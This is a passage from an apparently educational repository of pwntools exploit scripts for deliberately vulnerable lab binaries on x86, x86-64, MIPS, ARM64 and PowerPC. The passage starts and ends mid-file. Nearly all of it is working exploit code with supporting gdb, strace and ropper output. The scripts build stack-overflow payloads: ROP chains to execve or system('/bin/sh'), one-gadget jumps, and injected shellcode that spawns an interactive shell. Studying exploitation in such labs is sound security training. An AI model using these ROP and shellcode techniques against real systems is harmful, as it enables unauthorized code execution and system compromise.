42 | 43 | context(arch='amd64', os='linux', endian='little', word_size=64) 44 | 45 | binary_path = './bin/x86-64/08-overwrite-global' 46 | 47 | vulnerable_ret_addr = 0x7fffffffdda8 48 | buffer_addr = 0x7fffffffdd20 49 | libc_addr = 0x7ffff79e4000 50 | 51 | pop_rax_ret_addr = libc_addr + 0x00000000000439c8 52 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 53 | mov_qword_ptr_rax_rdi_ret_addr = libc_addr + 0x0000000000097055 54 | 55 | binary = ELF(binary_path) 56 | not_called_addr = binary.symbols['not_called'] 57 | x_addr = binary.symbols['x'] 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p64(pop_rax_ret_addr) 65 | payload += p64(x_addr) 66 | payload += p64(pop_rdi_ret_addr) 67 | payload += p64(0xdeadbabebeefc0de) 68 | payload += p64(mov_qword_ptr_rax_rdi_ret_addr) 69 | payload += p64(not_called_addr) 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 
| p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/mips/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | ... 8 | 0x00400804 <+132>: lw ra,156(sp) 9 | 0x00400808 <+136>: lw s8,152(sp) 10 | 0x0040080c <+140>: addiu sp,sp,160 11 | 0x00400810 <+144>: jr ra 12 | 0x00400814 <+148>: nop 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x40079c: file src/07-execve-rop.c, line 6. 16 | (gdb) b *0x00400804 17 | Breakpoint 2 at 0x400804: file src/07-execve-rop.c, line 11. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x00400804 in vulnerable () at src/07-execve-rop.c:11 29 | 11 } 30 | (gdb) p/x $sp+156 31 | $2 = 0x7fffefac 32 | """ 33 | 34 | """ 35 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/08-overwrite-global 36 | ... 37 | 10601 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 38 | ... 39 | 10601 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 40 | ... 
41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 45 | 0x000667cc: lw $ra, 0x3c($sp); lw $s1, 0x38($sp); lw $s0, 0x34($sp); jr $ra; addiu $sp, $sp, 0x40; 46 | 0x000f2a10: sw $s0, ($s1); lw $ra, 0x3c($sp); lw $s1, 0x38($sp); lw $s0, 0x34($sp); jr $ra; addiu $sp, $sp, 0x40; 47 | """ 48 | 49 | import struct 50 | import sys 51 | 52 | from pwn import * 53 | 54 | context(arch='mips', os='linux', endian='big', word_size=32) 55 | 56 | binary_path = './bin/mips/08-overwrite-global' 57 | 58 | ra_saved_addr = 0x7fffefac 59 | buffer_addr = 0x7fffef28 60 | libc_addr = 0x7f615000 61 | 62 | lw_s1_s0_addr = libc_addr + 0x000667cc 63 | sw_s0_s1_addr = libc_addr + 0x000f2a10 64 | 65 | binary = ELF(binary_path) 66 | not_called_addr = binary.symbols['not_called'] 67 | x_addr = binary.symbols['x'] 68 | 69 | p = process(binary_path) 70 | #p = gdb.debug([binary_path]) 71 | 72 | payload = '' 73 | payload += 'a' * (ra_saved_addr - buffer_addr) 74 | payload += p32(lw_s1_s0_addr) 75 | 76 | payload += 'b' * 0x34 77 | payload += p32(0xbeefc0de) # s0 78 | payload += p32(x_addr) # s1 79 | payload += p32(sw_s0_s1_addr) # ra 80 | 81 | payload += 'c' * 0x3c 82 | payload += p32(not_called_addr) # ra 83 | 84 | p.readuntil('> ') 85 | p.write(payload) 86 | p.interactive() 87 | -------------------------------------------------------------------------------- /pwn/x86/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484b6: file src/07-execve-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 
11 | 12 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 15016 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/i386-linux-gnu/libc-2.27.so 33 | 0x00002d37: int 0x80; 34 | 0x00024b5e: pop eax; ret; 35 | 0x00018be5: pop ebx; ret; 36 | 0x001926d5: pop ecx; ret; 37 | 0x00001aae: pop edx; ret; 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='x86', os='linux', endian='little', word_size=32) 46 | 47 | binary_path = './bin/x86/07-execve-rop' 48 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 49 | 50 | vulnerable_ret_addr = 0xffffcf8c 51 | buffer_addr = 0xffffcf00 52 | libc_addr = 0xf7dd1000 53 | 54 | int_0x80_addr = libc_addr + 0x00002d37 55 | pop_eax_ret_addr = libc_addr + 0x00024b5e 56 | pop_ebx_ret_addr = libc_addr + 0x00018be5 57 | pop_ecx_ret_addr = libc_addr + 0x001926d5 58 | pop_edx_ret_addr = libc_addr + 0x00001aae 59 | 60 | libc = ELF(libc_path) 61 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 68 | payload += p32(pop_eax_ret_addr) 69 | payload += p32(0xb) # execve syscall 70 | payload += p32(pop_ebx_ret_addr) 71 | payload += p32(bin_sh_addr) 72 | payload += p32(pop_ecx_ret_addr) 73 | payload += p32(0) # argv 74 | payload += p32(pop_edx_ret_addr) 75 | payload += p32(0) # envp 76 
| payload += p32(int_0x80_addr) 77 | 78 | p.readuntil('> ') 79 | p.write(payload) 80 | p.interactive() 81 | -------------------------------------------------------------------------------- /pwn/arm64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006fc <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400718 <+28>: ret 9 | End of assembler dump. 10 | (gdb) b vulnerable 11 | Breakpoint 1 at 0x40067c: file src/08-overwrite-global.c, line 9. 12 | (gdb) b *0x0000000000400714 13 | Breakpoint 2 at 0x400714: file src/08-overwrite-global.c, line 26. 14 | (gdb) c 15 | Continuing. 16 | 17 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 18 | 9 printf("> "); 19 | (gdb) p &buffer[0] 20 | $1 = 0x40007ffd30 "" 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 2, main (argc=1, argv=0x40007fff08) at src/08-overwrite-global.c:26 25 | 26 } 26 | (gdb) i r $sp 27 | sp 0x40007ffdb0 0x40007ffdb0 28 | """ 29 | 30 | """ 31 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/08-overwrite-global 32 | ... 33 | 8744 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 8744 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 36 | ... 
37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 41 | 0x00020400: ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 42 | 0x000ec04c: str x19, [x20]; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; 43 | """ 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='aarch64', os='linux', endian='little', word_size=64) 51 | 52 | binary_path = './bin/arm64/08-overwrite-global' 53 | 54 | saved_x30_addr = 0x40007ffdb0 + 8 55 | buffer_addr = 0x40007ffd30 56 | libc_addr = 0x0000004000852000 57 | 58 | ldp_x19_x20_ldp_x29_x30_ret_addr = libc_addr + 0x00020400 59 | str_x19_x20_ldp_x29_x30_ret_addr = libc_addr + 0x000ec04c 60 | 61 | binary = ELF(binary_path) 62 | not_called_addr = binary.symbols['not_called'] 63 | x_addr = binary.symbols['x'] 64 | 65 | p = process(binary_path) 66 | #p = gdb.debug([binary_path]) 67 | 68 | payload = '' 69 | payload += 'a' * (saved_x30_addr - buffer_addr) 70 | payload += p64(ldp_x19_x20_ldp_x29_x30_ret_addr) 71 | payload += 'b' * 16 72 | # <- $sp 73 | payload += p64(0) # x29 74 | payload += p64(str_x19_x20_ldp_x29_x30_ret_addr) # x30 75 | payload += p64(0xdeadbabebeefc0de) # x19 76 | payload += p64(x_addr) # x20 77 | # <- $sp 78 | payload += p64(0) # x29 79 | payload += p64(not_called_addr) # x30 80 | 81 | p.readuntil('> ') 82 | p.write(payload) 83 | p.interactive() 84 | -------------------------------------------------------------------------------- /pwn/arm64/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/03-one-gadget.c, line 6. 
13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/03-one-gadget.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd90 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1, argv=0x40007fff68) at src/03-one-gadget.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe10 0x40007ffe10 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/03-one-gadget 33 | ... 34 | 31623 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 31623 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ one_gadget /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x63e80 execl("/bin/sh", x1) 43 | constraints: 44 | x1 == NULL 45 | ... 46 | """ 47 | 48 | """ 49 | ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 50 | 0x0002c490: ldr x1, [x29, #0x18]; ldp x29, x30, [sp], #0x20; mov x0, x1; ret; 51 | """ 52 | 53 | import struct 54 | import sys 55 | 56 | from pwn import * 57 | 58 | context(arch='aarch64', os='linux', endian='little', word_size=64) 59 | 60 | binary_path = './bin/arm64/03-one-gadget' 61 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 62 | 63 | saved_x30_addr = 0x40007ffe10 + 8 64 | buffer_addr = 0x40007ffd90 65 | libc_addr = 0x0000004000852000 66 | 67 | one_gadget_addr = libc_addr + 0x63e80 68 | ldr_x1_x30_ret_addr = libc_addr + 0x0002c490 69 | 70 | libc = ELF(libc_path) 71 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 72 | zero_addr = libc_addr + libc.search(p64(0)).next() 73 | 74 | p = process(binary_path) 75 | #p = gdb.debug([binary_path]) 76 | 77 | # Need to satisfy that x1 == NULL constraint. 
78 | payload = '' 79 | payload += 'a' * (saved_x30_addr - buffer_addr - 8) 80 | payload += p64(zero_addr - 0x18) # x29 81 | payload += p64(ldr_x1_x30_ret_addr) 82 | payload += 'b' * 16 83 | payload += p64(0) # x29 84 | payload += p64(one_gadget_addr) # x30 85 | 86 | p.readuntil('> ') 87 | p.write(payload) 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/mips/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | 0x00400784 <+4>: sw ra,156(sp) 8 | ... 9 | 0x00400804 <+132>: lw ra,156(sp) 10 | 0x00400808 <+136>: lw s8,152(sp) 11 | 0x0040080c <+140>: addiu sp,sp,160 12 | 0x00400810 <+144>: jr ra 13 | 0x00400814 <+148>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40079c: file src/06-system-rop.c, line 6. 17 | (gdb) b *0x00400804 18 | Breakpoint 2 at 0x400804: file src/06-system-rop.c, line 11. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x00400804 in vulnerable () at src/06-system-rop.c:11 30 | 11 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefac 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/06-system-rop 37 | ... 38 | 29541 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 29541 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 
42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 46 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 47 | 0x00147638: move $t9, $s1; lw $a0, 0x28($sp); jalr $t9; nop; 48 | """ 49 | 50 | import struct 51 | import sys 52 | 53 | from pwn import * 54 | 55 | context(arch='mips', os='linux', endian='big', word_size=32) 56 | 57 | binary_path = './bin/mips/06-system-rop' 58 | libc_path = '/usr/mips-linux-gnu/lib/libc-2.27.so' 59 | 60 | ra_saved_addr = 0x7fffefac 61 | buffer_addr = 0x7fffef28 62 | libc_addr = 0x7f615000 63 | 64 | lw_s1_s2_addr = libc_addr + 0x0001b1e8 65 | lw_a0_jump_s1_addr = libc_addr + 0x00147638 66 | 67 | libc = ELF(libc_path) 68 | system_addr = libc_addr + libc.symbols['system'] 69 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 70 | 71 | p = process(binary_path) 72 | #p = gdb.debug([binary_path]) 73 | 74 | payload = '' 75 | payload += 'a' * (ra_saved_addr - buffer_addr) 76 | payload += p32(lw_s1_s2_addr) 77 | payload += 'b' * 0x18 78 | payload += p32(0) # s0 79 | payload += p32(system_addr) # s1 80 | payload += p32(0) # s2 81 | payload += p32(lw_a0_jump_s1_addr) # ra 82 | payload += 'c' * 0x28 83 | payload += p32(bin_sh_addr) 84 | 85 | p.readuntil('> ') 86 | p.write(payload) 87 | p.interactive() 88 | -------------------------------------------------------------------------------- /pwn/arm64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/07-execve-rop.c, line 6. 
13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/07-execve-rop.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1650614882, argv=0x6262626262626262) at src/07-execve-rop.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/07-execve-rop 33 | ... 34 | 27963 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 27963 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x0002c818: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret; 43 | 0x0008ffd4: mov x2, x22; mov x1, x21; mov x0, x20; blr x19; 44 | 0x000a2aa0: movz x8, #0xdd; svc #0; cmn x0, #0xfff; b.hs #0xa2ab4; ret; 45 | """ 46 | 47 | import struct 48 | import sys 49 | 50 | from pwn import * 51 | 52 | context(arch='aarch64', os='linux', endian='little', word_size=64) 53 | 54 | binary_path = './bin/arm64/07-execve-rop' 55 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 56 | 57 | saved_x30_addr = 0x40007ffe00 + 8 58 | buffer_addr = 0x40007ffd80 59 | libc_addr = 0x0000004000852000 60 | 61 | ldp_many_addr = libc_addr + 0x0002c818 62 | mov_args_blr_x19_addr = libc_addr + 0x0008ffd4 63 | mov_x8_execve_svc_addr = libc_addr + 0x000a2aa0 64 | 65 | libc = ELF(libc_path) 66 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 67 | 68 | p = process(binary_path) 69 | #p = gdb.debug([binary_path]) 70 | 71 | payload = '' 72 | payload += 'a' * (saved_x30_addr - buffer_addr) 73 | payload += p64(ldp_many_addr) 74 | payload += 'b' * 16 75 | # <- $sp 76 | payload += p64(0) # x29 77 | payload += 
p64(mov_args_blr_x19_addr) # x30 78 | payload += p64(mov_x8_execve_svc_addr) # x19 79 | payload += p64(bin_sh_addr) # x20 -> x0 80 | payload += p64(0) # x21 81 | payload += p64(0) # x22 82 | 83 | p.readuntil('> ') 84 | p.write(payload) 85 | p.interactive() 86 | -------------------------------------------------------------------------------- /pwn/ppc/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x100005a8 <+92>: lwz r0,4(r11) 9 | 0x100005ac <+96>: mtlr r0 10 | 0x100005b0 <+100>: lwz r31,-4(r11) 11 | 0x100005b4 <+104>: mr r1,r11 12 | 0x100005b8 <+108>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/05-shellcode-dynamic.c, line 6. 16 | (gdb) b *0x100005a8 17 | Breakpoint 2 at 0x100005a8: file src/05-shellcode-dynamic.c, line 14. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0xffffdd98 "\377\377\335", 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x100005a8 in vulnerable () at src/05-shellcode-dynamic.c:14 29 | 14 } 30 | (gdb) p/x $r11+4 31 | $2 = 0xffffde24 32 | """ 33 | 34 | """ 35 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/05-shellcode-dynamic 36 | ... 37 | 24557 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 38 | ... 39 | 24557 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 40 | ... 
41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 45 | 0x00171014: mtctr r11; bctr; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='powerpc', os='linux', endian='big', word_size=32) 54 | 55 | binary_path = './bin/ppc/05-shellcode-dynamic' 56 | 57 | saved_pc_addr = 0xffffde24 58 | buffer_addr = 0xffffdd98 59 | libc_addr = 0x0fe2c000 60 | 61 | mtctr_r11_bctr_addr = libc_addr + 0x00171014 62 | 63 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 64 | shellcode = \ 65 | '\x7c\x3f\x0b\x78' + \ 66 | '\x7c\xa5\x2a\x79' + \ 67 | '\x42\x40\xff\xf9' + \ 68 | '\x7f\x08\x02\xa6' + \ 69 | '\x3b\x18\x01\x34' + \ 70 | '\x98\xb8\xfe\xfb' + \ 71 | '\x38\x78\xfe\xf4' + \ 72 | '\x90\x61\xff\xf8' + \ 73 | '\x38\x81\xff\xf8' + \ 74 | '\x90\xa1\xff\xfc' + \ 75 | '\x3b\xc0\x01\x60' + \ 76 | '\x7f\xc0\x2e\x70' + \ 77 | '\x44\x00\x00\x00' + \ 78 | '/bin/shZ' 79 | 80 | p = process(binary_path) 81 | #p = gdb.debug([binary_path]) 82 | 83 | payload = '' 84 | payload += 'a' * (saved_pc_addr - buffer_addr - 4) 85 | # <- $r1 == $r11 86 | payload += p32(0x42000008) # relative branch to $pc+8 87 | payload += p32(mtctr_r11_bctr_addr) 88 | # <- $r1 + 8 89 | payload += shellcode 90 | 91 | p.readuntil('> ') 92 | p.write(payload) 93 | p.interactive() 94 | -------------------------------------------------------------------------------- /pwn/mips/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x004007c0 <+0>: addiu sp,sp,-160 7 | 0x004007c4 <+4>: sw ra,156(sp) 8 | ... 9 | 0x0040085c <+156>: lw ra,156(sp) 10 | 0x00400860 <+160>: lw s8,152(sp) 11 | 0x00400864 <+164>: addiu sp,sp,160 12 | 0x00400868 <+168>: jr ra 13 | 0x0040086c <+172>: nop 14 | End of assembler dump. 
15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x4007dc: file src/05-shellcode-dynamic.c, line 6. 17 | (gdb) b *0x0040085c 18 | Breakpoint 2 at 0x40085c: file src/05-shellcode-dynamic.c, line 13. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef28 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0040085c in vulnerable () at src/05-shellcode-dynamic.c:13 30 | 13 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefac 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/05-shellcode-dynamic 37 | ... 38 | 23704 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 23704 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 42 | """ 43 | 44 | """ 45 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 46 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 47 | 0x0002d518: move $s5, $s2; move $t9, $s1; jalr $t9; move $a0, $s7; 48 | 0x000f0d3c: move $t9, $s5; jalr $t9; addiu $s6, $sp, 0x50; 49 | 0x000639e8: move $t9, $s6; jalr $t9; nop; 50 | """ 51 | 52 | import struct 53 | import sys 54 | 55 | from pwn import * 56 | 57 | context(arch='mips', os='linux', endian='big', word_size=32) 58 | 59 | binary_path = './bin/mips/05-shellcode-dynamic' 60 | 61 | ra_saved_addr = 0x7fffefac 62 | buffer_addr = 0x7fffef28 63 | libc_addr = 0x7f615000 64 | 65 | lw_s1_s2_addr = libc_addr + 0x0001b1e8 66 | move_s5_s2_jump_s1_addr = libc_addr + 0x0002d518 67 | addiu_s6_sp_0x50_jump_s5_addr = libc_addr + 0x000f0d3c 68 | jump_s6_addr = libc_addr + 0x000639e8 69 | 70 | shellcode = asm(shellcraft.sh()) 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (ra_saved_addr - buffer_addr) 77 | payload += p32(lw_s1_s2_addr) 78 | payload += 
'b' * 0x18 79 | payload += p32(0) # s0 80 | payload += p32(addiu_s6_sp_0x50_jump_s5_addr) # s1 81 | payload += p32(jump_s6_addr) # s2 82 | payload += p32(move_s5_s2_jump_s1_addr) # ra 83 | payload += 'c' * 0x50 84 | payload += shellcode 85 | 86 | p.readuntil('> ') 87 | p.write(payload) 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/ppc/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000052c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x10000580 <+84>: lwz r0,4(r11) 9 | 0x10000584 <+88>: mtlr r0 10 | 0x10000588 <+92>: lwz r31,-4(r11) 11 | 0x1000058c <+96>: mr r1,r11 12 | 0x10000590 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000540: file src/06-system-rop.c, line 6. 16 | (gdb) b *0x10000580 17 | Breakpoint 2 at 0x10000580: file src/06-system-rop.c, line 11. 18 | (gdb) b *0x10000590 19 | Breakpoint 3 at 0x10000590: file src/06-system-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdda8 "\377\377\336\b" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x10000580 in vulnerable () at src/06-system-rop.c:11 31 | 11 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffde34 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x10000590 in vulnerable () at src/06-system-rop.c:11 38 | 11 } 39 | (gdb) i r $r1 40 | r1 0xffffde30 4294958640 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/06-system-rop 45 | ... 46 | 21069 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 21069 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 
